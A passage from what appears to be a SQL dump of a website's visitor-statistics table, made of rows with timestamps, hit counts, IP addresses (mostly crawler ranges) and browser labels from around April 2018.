5,1,1,0,0,'54.36.148.166','other'),(237343,1525071605,1,1,0,0,'54.36.149.28','other'),(237344,1525071735,1,1,0,0,'54.36.149.40','other'),(237345,1525072075,1,1,0,0,'180.76.15.24','other'),(237346,1525072076,1,1,0,0,'54.36.148.241','other'),(237347,1525072310,1,1,0,0,'54.36.148.93','other'),(237348,1525072333,1,1,0,0,'54.36.148.228','other'),(237349,1525072346,1,1,0,0,'8.29.198.25','other'),(237350,1525072428,2,2,0,0,'5.9.144.195','other'),(237351,1525072466,1,1,0,0,'54.36.148.145','other'),(237352,1525072563,1,1,0,0,'54.36.148.208','other'),(237353,1525072901,1,1,0,0,'54.36.148.141','other'),(237354,1525073078,1,1,0,0,'54.36.148.98','other'),(237355,1525073103,1,1,0,0,'66.249.66.155','chrome'),(237356,1525073131,1,1,0,0,'66.249.66.75','chrome'),(237357,1525073198,1,1,0,0,'54.36.148.66','other'),(237358,1525073501,1,1,0,0,'54.36.149.6','other'),(237359,1525073689,1,1,0,0,'54.36.149.22','other'),(237360,1525073839,1,1,0,0,'91.196.178.89','chrome'),(237361,1525073978,1,1,0,0,'157.55.39.36','other'),(237362,1525074300,1,1,0,0,'93.188.37.229','chrome'),(237363,1525074301,1,1,0,0,'93.188.37.229','firefox'),(237364,1525074585,1,1,0,0,'54.36.149.70','other'),(237365,1525074651,1,1,0,0,'54.36.148.164','other'),(237366,1525074659,1,1,0,0,'54.36.149.59','other'),(237367,1525074694,1,1,0,0,'54.36.148.114','other'),(237368,1525074809,1,0,1,0,'66.249.66.156',''),(237369,1525075002,1,1,0,0,'54.36.149.107','other'),(237370,1525075156,1,1,0,0,'54.36.148.239','other'),(237371,1525075368,1,1,0,0,'216.244.66.237','other'),(237372,1525075711,1,1,0,0,'54.36.148.145','other'),(237373,1525075870,1,1,0,0,'54.36.149.74','other'),(237374,1525075937,1,1,0,0,'54.36.149.65','other'),(237375,1525075997,1,1,0,0,'54.36.148.15','other'),(237376,1525076213,8,8,0,0,'144.76.12.66','other'),(237377,1525076760,1,1,0,0,'216.244.66.237','other'),(237378,1525077078,1,1,0,0,'8.29.198.25','other'),(237379,1525077485,1,1,0,0,'54.36.148.175','other'),(237380,1525078051,1,1,0,0,'54.36.149.82','other'),(237381,1525078388,2,2,0,0,'54.36.148.177','other'),(237385,1525078489,1,1,0,0,'54.36.148.159','other'),(237386,1525079131,1,1,0,0,'54.36.148.35','other'),(237387,1525079316,1,1,0,0,'54.36.148.194','other'),(237388,1525079503,1,1,0,0,'54.36.149.106','other'),(237389,1525079579,1,1,0,0,'216.244.66.237','other'),(237390,1525079711,1,0,1,0,'66.249.66.155',''),(237391,1525079913,1,1,0,0,'54.36.148.218','other'),(237392,1525080318,1,1,0,0,'54.36.148.96','other'),(237393,1525080336,1,1,0,0,'54.36.148.240','other'),(237394,1525080340,1,1,0,0,'54.36.148.160','other'),(237395,1525080746,1,1,0,0,'54.36.148.47','other'),(237396,1525080986,1,1,0,0,'54.36.148.16','other'),(237397,1525081091,1,1,0,0,'54.36.149.22','other'),(237398,1525081135,1,1,0,0,'54.36.148.232','other'),(237399,1525081264,1,1,0,0,'54.36.149.12','other'),(237400,1525081300,1,1,0,0,'54.36.148.246','other'),(237401,1525081302,1,1,0,0,'54.36.149.55','other'),(237402,1525081908,1,1,0,0,'54.36.149.68','other'),(237403,1525081937,1,1,0,0,'54.36.148.41','other'),(237404,1525081964,1,1,0,0,'54.36.148.225','other'),(237405,1525082067,1,1,0,0,'54.36.149.88','other'),(237406,1525082068,3,3,0,0,'216.244.66.237','other'),(237407,1525082207,1,1,0,0,'54.36.148.112','other'),(237408,1525082460,1,1,0,0,'54.36.149.99','other'),(237409,1525082831,1,1,0,0,'54.36.148.53','other'),(237410,1525082964,1,1,0,0,'54.36.148.175','other'),(237411,1525082981,1,1,0,0,'157.55.39.36','other'),(237412,1525083112,1,1,0,0,'54.36.148.222','other'),(237413,1525083155,1,1,0,0,'54.36.148.117','other'),(237414,1525083176,1,1,0,0,'8.29.198.27','other'),(237415,1525083193,1,1,0,0,'54.36.148.179','other'),(237416,1525083363,1,1,0,0,'157.55.39.38','other'),(237417,1525083388,1,1,0,0,'54.36.148.132','other'),(237418,1525083466,1,1,0,0,'54.36.148.200','other'),(237419,1525083521,1,1,0,0,'54.36.149.34','other'),(237420,1525083576,1,1,0,0,'54.36.149.77','other'),(237421,1525083730,2,2,0,0,'216.244.66.237','other'),(237422,1525083739,1,1,0,0,'54.36.148.55','other'),(237423,1525083902,1,1,0,0,'54.36.148.38','other'),(237424,1525084131,1,0,1,0,'66.249.66.156',''),(237425,1525084139,1,1,0,0,'54.36.148.89','other'),(237426,1525084187,1,1,0,0,'54.36.148.224','other'),(237427,1525084353,1,0,1,0,'66.249.66.74',''),(237428,1525084369,1,1,0,0,'54.36.148.118','other'),(237429,1525084580,1,1,0,0,'54.36.148.153','other'),(237430,1525084746,1,1,0,0,'157.55.39.39','other'),(237431,1525084988,1,1,0,0,'54.36.148.59','other'),(237432,1525085379,1,1,0,0,'54.36.148.34','other'),(237433,1525085473,1,1,0,0,'54.36.149.6','other'),(237434,1525085605,1,1,0,0,'54.36.149.98','other'),(237435,1525085802,22,22,0,0,'167.114.219.41','other'),(237436,1525086000,1,1,0,0,'54.36.148.157','other'),(237437,1525086068,1,1,0,0,'92.112.249.60','chrome'),(237438,1525086234,1,1,0,0,'54.36.148.237','other'),(237439,1525086359,1,1,0,0,'54.36.149.75','other'),(237440,1525086441,2,2,0,0,'216.244.66.237','other'),(237441,1525086443,1,1,0,0,'54.36.148.147','other'),(237442,1525086723,1,1,0,0,'54.36.148.239','other'),(237443,1525086872,1,1,0,0,'54.36.148.221','other'),(237444,1525087110,1,1,0,0,'207.46.13.208','other'),(237445,1525087212,1,1,0,0,'54.36.148.138','other'),(237446,1525087398,1,1,0,0,'54.36.149.63','other'),(237447,1525087477,1,0,1,0,'66.249.66.156',''),(237448,1525087819,1,1,0,0,'54.36.149.64','other'),(237449,1525088156,1,0,1,0,'66.249.66.157',''),(237450,1525088167,1,1,0,0,'54.36.149.89','other'),(237451,1525088264,1,1,0,0,'54.36.148.59','other'),(237452,1525088294,1,1,0,0,'8.29.198.26','other'),(237453,1525088454,1,0,1,0,'66.249.66.74',''),(237454,1525088542,1,1,0,0,'54.165.59.7','other'),(237455,1525088574,2,2,0,0,'162.210.196.129','other'),(237456,1525088636,1,1,0,0,'54.36.148.138','other'),(237457,1525088654,1,1,0,0,'66.249.66.156','chrome'),(237458,1525088658,1,1,0,0,'66.249.66.74','chrome'),(237459,1525088882,1,1,0,0,'54.36.149.35','other'),(237460,1525089126,1,1,0,0,'54.36.148.154','other'),(237461,1525089240,1,1,0,0,'54.36.149.84','other'),(237462,1525089359,1,1,0,0,'54.36.148.118','other'),(237463,1525089554,1,1,0,0,'54.36.148.143','other'),(237464,1525089673,1,1,0,0,'54.36.148.179','other'),(237465,1525089729,1,1,0,0,'54.36.148.168','other'),(237466,1525090208,1,1,0,0,'54.36.148.141','other'),(237467,1525090254,1,1,0,0,'54.36.149.61','other'),(237468,1525090278,1,1,0,0,'54.36.148.25','other'),(237469,1525090397,2,2,0,0,'54.36.149.37','other'),(237470,1525090408,1,1,0,0,'54.36.148.30','other'),(237471,1525090514,1,1,0,0,'54.36.148.21','other'),(237472,1525090679,1,1,0,0,'54.36.148.174','other'),(237473,1525090696,1,1,0,0,'54.36.148.246','other'),(237474,1525090714,1,1,0,0,'54.36.148.54','other'),(237475,1525090726,1,1,0,0,'54.36.148.226','other'),(237476,1525090877,2,2,0,0,'216.244.66.237','other'),(237477,1525090907,1,1,0,0,'54.36.149.38','other'),(237478,1525091279,1,1,0,0,'91.209.11.236','other'),(237479,1525091512,1,1,0,0,'157.55.39.39','other'),(237480,1525091602,1,1,0,0,'54.36.149.83','other'),(237481,1525091729,1,1,0,0,'54.36.149.63','other'),(237482,1525092059,1,1,0,0,'54.36.148.121','other'),(237483,1525092181,1,1,0,0,'54.36.148.92','other'),(237484,1525092544,1,1,0,0,'54.36.148.86','other'),(237485,1525092599,3,3,0,0,'216.244.66.237','other'),(237486,1525092804,1,1,0,0,'54.36.148.248','other'),(237487,1525093180,1,1,0,0,'54.36.149.39','other'),(237488,1525093317,1,1,0,0,'54.36.149.64','other'),(237489,1525093390,1,1,0,0,'54.36.148.134','other'),(237490,1525093619,1,1,0,0,'54.36.149.99','other'),(237491,1525093631,1,1,0,0,'54.36.149.89','other'),(237492,1525093943,1,1,0,0,'5.45.207.49','other'),(237493,1525093948,1,1,0,0,'54.36.148.214','other'),(237494,1525093970,1,1,0,0,'216.244.66.237','other'),(237495,1525093992,2,2,0,0,'54.36.148.48','other'),(237496,1525094008,1,1,0,0,'8.29.198.25','other'),(237497,1525094029,1,1,0,0,'54.36.148.118','other'),(237498,1525094044,1,1,0,0,'194.187.170.119','other'),(237499,1525094268,1,1,0,0,'54.36.148.19','other'),(237500,1525094396,1,1,0,0,'54.36.149.8','other'),(237501,1525094418,1,1,0,0,'54.36.148.68','other'),(237502,1525094518,1,1,0,0,'54.36.148.143','other'),(237503,1525094718,1,0,1,0,'66.249.66.157',''),(237504,1525095227,1,1,0,0,'54.36.148.125','other'),(237505,1525095436,1,1,0,0,'216.244.66.237','other'),(237506,1525095499,1,1,0,0,'54.36.149.107','other'),(237507,1525095553,1,0,1,0,'66.249.66.155',''),(237508,1525095652,1,1,0,0,'54.36.148.50','other'),(237509,1525096038,1,1,0,0,'54.36.148.15','other'),(237510,1525096054,1,1,0,0,'54.36.149.39','other'),(237511,1525096312,1,0,1,0,'66.249.66.74',''),(237512,1525096396,1,1,0,0,'66.249.66.156','chrome'),(237513,1525096398,1,1,0,0,'54.36.148.212','other'),(237514,1525096410,1,1,0,0,'66.249.66.74','chrome'),(237515,1525096572,1,1,0,0,'54.36.148.191','other'),(237516,1525097020,1,1,0,0,'54.36.149.39','other'),(237517,1525097239,1,1,0,0,'54.36.148.251','other'),(237518,1525097248,1,1,0,0,'54.36.148.187','other'),(237519,1525097443,1,1,0,0,'54.36.149.79','other'),(237520,1525097740,1,1,0,0,'54.36.148.143','other'),(237521,1525097819,1,1,0,0,'54.36.148.168','other'),(237522,1525098022,1,1,0,0,'188.230.43.254','other'),(237523,1525098087,1,1,0,0,'54.36.148.36','other'),(237524,1525098303,1,1,0,0,'54.36.148.240','other'),(237525,1525098412,1,1,0,0,'54.36.148.112','other'),(237526,1525098417,1,1,0,0,'37.9.113.80','other'),(237527,1525098443,1,1,0,0,'109.227.75.120','firefox'),(237528,1525098444,1,1,0,0,'54.36.148.19','other'),(237529,1525098638,1,1,0,0,'54.36.148.242','other'),(237530,1525098954,1,1,0,0,'54.36.148.253','other'),(237531,1525099151,1,1,0,0,'8.29.198.27','other'),(237532,1525099209,1,1,0,0,'37.9.113.63','other'),(237533,1525099238,2,2,0,0,'92.113.126.46','chrome'),(237534,1525099366,1,1,0,0,'54.36.148.119','other'),(237535,1525099382,1,1,0,0,'54.36.148.195','other'),(237536,1525099409,1,1,0,0,'54.36.148.229','other'),(237537,1525099418,1,1,0,0,'37.9.113.151','other'),(237538,1525099436,1,1,0,0,'46.161.9.39','chrome'),(237539,1525099437,1,1,0,0,'46.161.9.39','firefox'),(237540,1525099578,1,1,0,0,'54.36.148.77','other'),(237541,1525099718,1,1,0,0,'141.8.142.126','other'),(237542,1525099921,1,1,0,0,'54.36.149.52','other'),(237543,1525099976,1,1,0,0,'87.250.224.96','other'),(237544,1525100062,1,1,0,0,'54.36.148.253','other'),(237545,1525100094,1,1,0,0,'54.36.149.59','other'),(237546,1525100099,1,1,0,0,'54.36.148.131','other'),(237547,1525100114,1,1,0,0,'54.36.148.55','other'),(237548,1525100117,1,1,0,0,'178.154.171.81','other'),(237549,1525100168,1,1,0,0,'46.119.139.206','chrome'),(237550,1525100174,1,1,0,0,'54.36.148.139','other'),(237551,1525100241,1,1,0,0,'54.36.149.106','other'),(237552,1525100270,1,1,0,0,'54.36.148.163','other'),(237553,1525100287,1,1,0,0,'54.36.148.143','other'),(237554,1525100393,1,1,0,0,'54.36.148.231','other'),(237555,1525100418,1,1,0,0,'188.230.43.254','other'),(237556,1525100598,1,1,0,0,'54.36.149.6','other'),(237557,1525100645,1,1,0,0,'54.36.148.194','other'),(237558,1525100751,1,1,0,0,'54.36.148.49','other'),(237559,1525100853,1,1,0,0,'54.36.148.214','other'),(237560,1525100875,1,0,1,0,'66.249.66.74',''),(237561,1525100948,4,4,0,0,'216.244.66.237','other'),(237562,1525101094,1,1,0,0,'54.36.148.126','other'),(237563,1525101402,1,1,0,0,'54.36.149.80','other'),(237564,1525101652,2,2,0,0,'54.36.149.82','other'),(237565,1525101849,1,1,0,0,'54.36.149.34','other'),(237566,1525102357,1,1,0,0,'54.36.148.58','other'),(237567,1525102398,1,1,0,0,'54.36.148.91','other'),(237568,1525102530,1,1,0,0,'46.161.9.39','chrome'),(237569,1525102929,1,1,0,0,'54.36.149.65','other'),(237570,1525103113,1,1,0,0,'54.36.148.66','other'),(237571,1525103129,1,1,0,0,'180.76.15.147','other'),(237572,1525103173,1,1,0,0,'54.36.148.109','other'),(237573,1525103255,1,1,0,0,'54.36.149.24','other'),(237574,1525103499,1,1,0,0,'54.36.148.153','other'),(237575,1525103634,1,1,0,0,'54.36.149.61','other'),(237576,1525104097,1,1,0,0,'54.36.148.221','other'),(237577,1525104185,1,1,0,0,'54.36.148.35','other'),(237578,1525104233,1,1,0,0,'87.250.224.125','other'),(237579,1525104276,1,1,0,0,'37.9.113.82','other'),(237580,1525104585,1,1,0,0,'141.8.142.74','other'),(237581,1525104588,1,1,0,0,'37.9.113.182','other'),(237582,1525104612,1,1,0,0,'54.36.149.29','other'),(237583,1525104840,1,1,0,0,'8.29.198.25','other'),(237584,1525105033,2,2,0,0,'54.36.148.33','other'),(237585,1525105123,1,1,0,0,'54.36.148.67','other'),(237586,1525105309,1,1,0,0,'178.154.200.59','other'),(237587,1525105313,1,1,0,0,'54.36.148.248','other'),(237588,1525105399,1,1,0,0,'141.8.142.50','other'),(237589,1525105400,1,1,0,0,'141.8.142.123','other'),(237590,1525105603,1,1,0,0,'54.36.148.188','other'),(237591,1525105684,1,1,0,0,'216.244.66.237','other'),(237592,1525106037,1,1,0,0,'54.36.149.0','other'),(237593,1525106495,1,1,0,0,'54.36.149.3','other'),(237594,1525106597,1,1,0,0,'54.36.149.75','other'),(237595,1525107145,1,1,0,0,'216.244.66.237','other'),(237596,1525107317,1,1,0,0,'54.36.148.213','other'),(237597,1525107396,1,1,0,0,'54.36.148.158','other'),(237598,1525107485,1,1,0,0,'54.36.148.230','other'),(237599,1525107540,1,1,0,0,'54.36.148.191','other'),(237600,1525107602,1,1,0,0,'54.36.149.40','other'),(237601,1525107850,1,1,0,0,'157.55.39.38','other'),(237602,1525107990,1,1,0,0,'54.36.148.182','other'),(237603,1525108104,1,1,0,0,'54.36.148.220','other'),(237604,1525108250,1,1,0,0,'54.36.148.28','other'),(237605,1525108258,1,1,0,0,'178.154.171.4','other'),(237606,1525108299,1,1,0,0,'54.36.148.85','other'),(237607,1525108424,1,1,0,0,'141.8.142.50','other'),(237608,1525108458,1,1,0,0,'54.36.148.19','other'),(237609,1525108664,1,1,0,0,'54.36.148.16','other'),(237610,1525108966,1,1,0,0,'54.36.149.50','other'),(237611,1525108974,1,1,0,0,'54.36.148.252','other'),(237612,1525109137,1,1,0,0,'54.36.148.51','other'),(237613,1525109298,1,1,0,0,'157.55.39.39','other'),(237614,1525109812,1,1,0,0,'141.8.132.22','other'),(237615,1525110012,1,1,0,0,'8.29.198.26','other'),(237616,1525110138,1,1,0,0,'216.244.66.237','other'),(237617,1525110165,1,1,0,0,'54.36.148.23','other'),(237618,1525110265,1,1,0,0,'54.36.148.228','other'),(237619,1525110333,1,1,0,0,'54.36.148.137','other'),(237620,1525110440,1,1,0,0,'54.36.149.33','other'),(237621,1525110441,1,1,0,0,'54.36.148.209','other'),(237622,1525110786,1,1,0,0,'54.36.148.243','other'),(237623,1525111016,1,1,0,0,'54.36.149.17','other'),(237624,1525111166,1,1,0,0,'54.36.148.170','other'),(237625,1525111182,1,1,0,0,'54.36.148.123','other'),(237626,1525111398,1,1,0,0,'54.36.148.29','other'),(237627,1525111512,1,1,0,0,'216.244.66.237','other'),(237628,1525111659,1,1,0,0,'54.36.149.97','other'),(237629,1525111701,1,1,0,0,'54.36.148.61','other'),(237630,1525111755,1,0,1,0,'66.249.66.157',''),(237631,1525111982,1,1,0,0,'54.36.148.141','other'),(237632,1525112092,1,1,0,0,'54.36.148.191','other'),(237633,1525112234,1,1,0,0,'54.36.149.3','other'),(237634,1525112278,1,1,0,0,'54.36.148.175','other'),(237635,1525112403,1,1,0,0,'54.36.149.72','other'),(237636,1525112411,1,1,0,0,'54.36.148.151','other'),(237637,1525112812,1,1,0,0,'54.36.148.106','other'),(237638,1525112914,1,1,0,0,'216.244.66.237','other'),(237639,1525112960,1,1,0,0,'54.36.148.224','other'),(237640,1525113040,1,1,0,0,'54.36.148.38','other'),(237641,1525113056,1,1,0,0,'54.36.148.214','other'),(237642,1525113332,1,1,0,0,'54.36.148.203','other'),(237643,1525113499,1,1,0,0,'37.9.113.74','other'),(237644,1525113502,1,1,0,0,'141.8.142.29','other'),(237645,1525113546,1,1,0,0,'178.154.171.24','other'),(237646,1525113585,1,1,0,0,'95.108.213.24','other'),(237647,1525113769,1,1,0,0,'54.36.149.2','other'),(237648,1525113924,1,1,0,0,'157.55.39.38','other'),(237649,1525114090,1,1,0,0,'46.161.9.39','firefox'),(237650,1525114285,1,1,0,0,'37.9.113.182','other'),(237651,1525114288,1,1,0,0,'178.154.200.8','other'),(237652,1525114351,2,2,0,0,'54.36.149.68','other'),(237653,1525114520,1,1,0,0,'54.36.149.61','other'),(237654,1525114582,1,1,0,0,'54.36.148.216','other'),(237655,1525114727,1,1,0,0,'178.154.171.24','other'),(237656,1525114755,1,1,0,0,'54.36.149.87','other'),(237657,1525114775,1,1,0,0,'54.36.148.233','other'),(237658,1525114902,1,1,0,0,'35.226.23.240','other'),(237659,1525115190,1,1,0,0,'54.36.148.255','other'),(237660,1525115299,1,1,0,0,'54.36.148.43','other'),(237661,1525115507,1,1,0,0,'54.36.148.18','other'),(237662,1525115584,1,1,0,0,'37.9.113.74','other'),(237663,1525115658,1,1,0,0,'54.36.148.21','other'),(237664,1525115676,1,1,0,0,'8.29.198.27','other'),(237665,1525115726,1,1,0,0,'66.249.66.157','chrome'),(237666,1525116062,1,1,0,0,'54.36.148.161','other'),(237667,1525116240,1,1,0,0,'54.36.149.23','other'),(237668,1525116280,2,2,0,0,'54.36.149.83','other'),(237669,1525116709,1,1,0,0,'54.36.148.110','other'),(237670,1525116770,1,1,0,0,'54.36.148.146','other'),(237671,1525116860,1,1,0,0,'54.36.149.72','other'),(237672,1525116965,1,1,0,0,'54.36.148.29','other'),(237673,1525116994,1,1,0,0,'54.36.149.85','other'),(237674,1525117398,1,1,0,0,'54.36.148.111','other'),(237675,1525117557,1,1,0,0,'54.36.148.32','other'),(237676,1525117643,2,2,0,0,'157.55.39.38','other'),(237677,1525117720,1,1,0,0,'54.36.148.56','other'),(237678,1525118071,1,1,0,0,'54.36.148.89','other'),(237679,1525118119,1,1,0,0,'178.154.171.4','other'),(237680,1525118363,1,1,0,0,'54.36.148.123','other'),(237681,1525118481,1,1,0,0,'141.8.142.96','other'),(237682,1525118550,2,2,0,0,'91.196.178.19','chrome'),(237683,1525118740,1,1,0,0,'40.77.167.184','other'),(237684,1525118748,1,1,0,0,'54.36.148.22','other'),(237685,1525118913,1,1,0,0,'54.36.149.63','other'),(237686,1525119076,1,0,1,0,'66.249.66.75',''),(237687,1525119098,1,1,0,0,'66.249.66.75','chrome'),(237688,1525119353,1,1,0,0,'54.36.148.59','other'),(237689,1525119496,1,1,0,0,'54.36.149.21','other'),(237690,1525119590,1,1,0,0,'54.36.148.10','other'),(237691,1525119615,1,1,0,0,'54.36.148.115','other'),(237692,1525119734,1,1,0,0,'54.36.148.137','other'),(237693,1525119767,1,1,0,0,'54.36.149.29','other'),(237694,1525120215,1,1,0,0,'54.36.148.127','other'),(237695,1525120389,1,1,0,0,'54.36.148.202','other'),(237696,1525120390,1,1,0,0,'54.36.149.9','other'),(237697,1525120391,1,1,0,0,'54.36.149.46','other'),(237698,1525120555,1,1,0,0,'54.36.149.107','other'),(237699,1525120558,1,1,0,0,'54.36.148.103','other'),(237700,1525120678,1,1,0,0,'54.36.148.216','other'),(237701,1525120750,1,1,0,0,'54.36.148.114','other'),(237702,1525120795,1,1,0,0,'141.8.132.19','other'),(237703,1525120833,1,1,0,0,'54.36.148.83','other'),(237704,1525120860,1,1,0,0,'8.29.198.26','other'),(237705,1525121051,1,1,0,0,'87.250.224.125','other'),(237706,1525121052,1,1,0,0,'66.249.66.157','chrome'),(237707,1525121440,2,2,0,0,'37.9.113.182','other'),(237708,1525121460,1,1,0,0,'54.36.148.89','other'),(237709,1525121524,1,0,1,0,'66.249.66.156',''),(237710,1525121557,1,1,0,0,'54.36.148.35','other'),(237711,1525121752,1,1,0,0,'54.36.148.118','other'),(237712,1525121781,1,1,0,0,'54.36.148.220','other'),(237713,1525121803,1,1,0,0,'54.36.148.165','other'),(237714,1525121946,1,1,0,0,'95.108.213.24','other'),(237715,1525122032,1,1,0,0,'54.36.148.16','other'),(237716,1525122052,2,2,0,0,'87.250.224.39','other'),(237717,1525122147,1,1,0,0,'141.8.132.19','other'),(237718,1525122150,1,1,0,0,'37.9.113.100','other'),(237719,1525122159,1,1,0,0,'54.36.149.62','other'),(237720,1525122636,1,1,0,0,'54.36.149.18','other'),(237721,1525122692,1,1,0,0,'54.36.148.221','other'),(237722,1525122898,1,0,1,0,'66.249.66.156',''),(237723,1525123071,1,1,0,0,'87.250.224.66','other'),(237724,1525123271,1,1,0,0,'54.36.148.122','other'),(237725,1525123326,1,1,0,0,'141.8.142.126','other'),(237726,1525123494,1,1,0,0,'54.36.148.66','other'),(237727,1525123576,1,1,0,0,'54.36.149.11','other'),(237728,1525123607,1,1,0,0,'54.36.148.185','other'),(237729,1525123621,1,1,0,0,'91.209.11.236','other'),(237730,1525123736,1,1,0,0,'54.36.148.12','other'),(237731,1525123858,1,1,0,0,'54.36.148.189','other'),(237732,1525124113,1,1,0,0,'54.36.148.176','other'),(237733,1525124214,1,1,0,0,'54.36.148.68','other'),(237734,1525124491,1,1,0,0,'54.36.148.145','other'),(237735,1525124672,1,1,0,0,'54.36.148.35','other'),(237736,1525124678,1,1,0,0,'54.36.149.49','other'),(237737,1525124757,1,1,0,0,'54.36.148.157','other'),(237738,1525124952,1,1,0,0,'141.8.142.134','other'),(237739,1525125039,1,1,0,0,'54.36.149.30','other'),(237740,1525125100,1,1,0,0,'54.36.148.79','other'),(237741,1525125214,1,1,0,0,'54.36.148.216','other'),(237742,1525125330,1,1,0,0,'54.36.148.246','other'),(237743,1525125345,1,1,0,0,'54.36.148.31','other'),(237744,1525125961,3,3,0,0,'216.244.66.237','other'),(237745,1525125979,1,1,0,0,'54.36.149.78','other'),(237746,1525126016,1,1,0,0,'207.46.13.165','other'),(237747,1525126017,1,1,0,0,'54.36.148.81','other'),(237748,1525126513,1,1,0,0,'8.29.198.26','other'),(237749,1525126681,2,2,0,0,'188.166.48.158','firefox'),(237750,1525126688,1,1,0,0,'128.30.52.64','other'),(237751,1525126854,1,1,0,0,'207.46.13.29','other'),(237752,1525126894,1,1,0,0,'54.36.148.189','other'),(237753,1525126907,1,1,0,0,'54.36.148.157','other'),(237754,1525126971,1,1,0,0,'87.250.224.77','other'),(237755,1525126979,1,1,0,0,'54.36.148.248','other'),(237756,1525127034,1,1,0,0,'54.36.148.132','other'),(237757,1525127051,1,1,0,0,'54.36.148.57','other'),(237758,1525127504,1,1,0,0,'54.36.149.103','other'),(237759,1525127516,3,3,0,0,'216.244.66.237','other'),(237760,1525127559,1,1,0,0,'54.36.149.57','other'),(237761,1525127741,1,1,0,0,'178.154.171.4','other'),(237762,1525127819,1,1,0,0,'54.36.148.179','other'),(237763,1525128204,1,1,0,0,'54.36.148.111','other'),(237764,1525128309,1,1,0,0,'54.36.148.156','other'),(237765,1525128339,1,1,0,0,'87.250.224.77','other'),(237766,1525128373,1,1,0,0,'5.45.207.49','other'),(237767,1525128789,1,1,0,0,'54.36.148.255','other'),(237768,1525128888,1,1,0,0,'54.36.148.149','other'),(237769,1525129190,1,1,0,0,'54.36.148.147','other'),(237770,1525129527,1,1,0,0,'141.8.142.134','other'),(237771,1525129762,1,1,0,0,'54.36.148.166','other'),(237772,1525129763,1,1,0,0,'54.36.148.144','other'),(237773,1525129923,1,1,0,0,'66.249.66.75','chrome'),(237774,1525129940,1,0,1,0,'66.249.66.74',''),(237775,1525130053,1,1,0,0,'66.249.66.156','chrome'),(237776,1525130324,1,1,0,0,'54.36.149.30','other'),(237777,1525130748,1,1,0,0,'54.36.149.11','other'),(237778,1525130786,1,1,0,0,'54.36.148.216','other'),(237779,1525131418,1,1,0,0,'54.36.149.49','other'),(237780,1525131501,1,1,0,0,'54.36.148.78','other'),(237781,1525131579,1,1,0,0,'54.36.148.253','other'),(237782,1525131600,1,1,0,0,'54.36.149.101','other'),(237783,1525131706,1,1,0,0,'8.29.198.26','other'),(237784,1525132201,1,1,0,0,'54.36.148.240','other'),(237785,1525132371,1,1,0,0,'141.8.132.19','other'),(237786,1525132417,1,1,0,0,'54.36.148.87','other'),(237787,1525132490,1,1,0,0,'141.8.142.96','other'),(237788,1525132665,1,1,0,0,'54.36.148.208','other'),(237789,1525132864,1,1,0,0,'54.36.148.250','other'),(237790,1525132872,1,1,0,0,'54.36.148.168','other'),(237791,1525132916,1,1,0,0,'54.36.148.82','other'),(237792,1525133054,1,0,1,0,'66.249.66.155',''),(237793,1525133127,1,0,1,0,'66.249.66.157',''),(237794,1525133171,1,1,0,0,'141.8.142.74','other'),(237795,1525133368,2,2,0,0,'216.244.66.237','other'),(237796,1525133570,1,1,0,0,'54.36.148.167','other'),(237797,1525133778,1,1,0,0,'5.45.207.83','other'),(237798,1525133794,1,1,0,0,'54.36.148.56','other'),(237799,1525134153,1,1,0,0,'217.69.133.218','other'),(237800,1525134753,1,1,0,0,'54.36.149.19','other'),(237801,1525134831,1,1,0,0,'141.8.142.123','other'),(237802,1525135172,1,1,0,0,'54.36.148.159','other'),(237803,1525135180,1,1,0,0,'54.36.149.39','other'),(237804,1525135441,1,1,0,0,'54.36.148.196','other'),(237805,1525135774,1,1,0,0,'54.36.148.115','other'),(237806,1525135781,1,1,0,0,'54.36.148.20','other'),(237807,1525135787,1,1,0,0,'66.249.66.74','chrome'),(237808,1525136230,2,2,0,0,'216.244.66.237','other'),(237809,1525136391,1,1,0,0,'54.36.148.25','other'),(237810,1525136881,1,1,0,0,'54.36.148.198','other'),(237811,1525137107,1,1,0,0,'54.36.148.81','other'),(237812,1525137223,1,1,0,0,'5.45.207.49','other'),(237813,1525137343,1,1,0,0,'8.29.198.26','other'),(237814,1525137372,1,1,0,0,'216.244.66.237','other'),(237815,1525137423,1,1,0,0,'141.8.142.123','other'),(237816,1525137520,1,1,0,0,'54.36.148.154','other'),(237817,1525137697,1,1,0,0,'54.36.149.51','other'),(237818,1525137966,1,1,0,0,'54.36.148.172','other'),(237819,1525138203,1,1,0,0,'54.36.149.11','other'),(237820,1525138292,1,1,0,0,'54.36.148.163','other'),(237821,1525138306,1,1,0,0,'54.36.148.149','other'),(237822,1525138349,1,1,0,0,'54.36.148.130','other'),(237823,1525138684,1,1,0,0,'54.36.148.52','other'),(237824,1525138973,1,1,0,0,'54.36.149.26','other'),(237825,1525139306,1,1,0,0,'54.36.149.45','other'),(237826,1525139538,1,1,0,0,'54.36.149.15','other'),(237827,1525139603,1,1,0,0,'54.36.148.170','other'),(237828,1525139805,1,1,0,0,'54.36.149.4','other'),(237829,1525139915,1,1,0,0,'66.249.66.157','chrome'),(237830,1525140245,1,1,0,0,'54.36.148.126','other'),(237831,1525140263,1,1,0,0,'54.36.148.31','other'),(237832,1525140282,1,1,0,0,'54.36.148.156','other'),(237833,1525140475,1,1,0,0,'54.36.148.175','other'),(237834,1525140525,1,1,0,0,'54.36.149.6','other'),(237835,1525140737,1,1,0,0,'54.36.149.52','other'),(237836,1525141263,1,1,0,0,'141.8.132.19','other'),(237837,1525141264,1,1,0,0,'54.36.148.224','other'),(237838,1525141575,1,0,1,0,'66.249.66.157',''),(237839,1525141587,1,1,0,0,'54.36.148.168','other'),(237840,1525141598,1,1,0,0,'46.161.9.39','firefox'),(237841,1525141730,1,1,0,0,'54.36.148.231','other'),(237842,1525141795,2,2,0,0,'216.244.66.237','other'),(237843,1525141874,1,0,1,0,'66.249.66.155',''),(237844,1525142000,1,1,0,0,'54.36.148.69','other'),(237845,1525142477,1,1,0,0,'54.36.149.0','other'),(237846,1525142559,1,1,0,0,'8.29.198.26','other'),(237847,1525142798,1,0,1,0,'66.249.66.75',''),(237848,1525142804,2,2,0,0,'95.213.141.126','opera'),(237849,1525142925,1,1,0,0,'54.36.149.65','other'),(237850,1525143296,1,1,0,0,'54.36.148.158','other'),(237851,1525143307,4,4,0,0,'216.244.66.237','other'),(237852,1525143394,1,1,0,0,'54.36.149.50','other'),(237853,1525143427,1,1,0,0,'141.8.142.50','other'),(237854,1525143437,1,1,0,0,'54.36.148.171','other'),(237855,1525143588,1,0,1,0,'66.249.66.155',''),(237856,1525143657,1,1,0,0,'54.36.148.34','other'),(237857,1525144010,1,1,0,0,'66.249.66.76','chrome'),(237858,1525144015,1,1,0,0,'141.8.132.19','other'),(237859,1525144017,1,1,0,0,'37.9.113.101','other'),(237860,1525144032,1,1,0,0,'54.36.148.253','other'),(237861,1525144577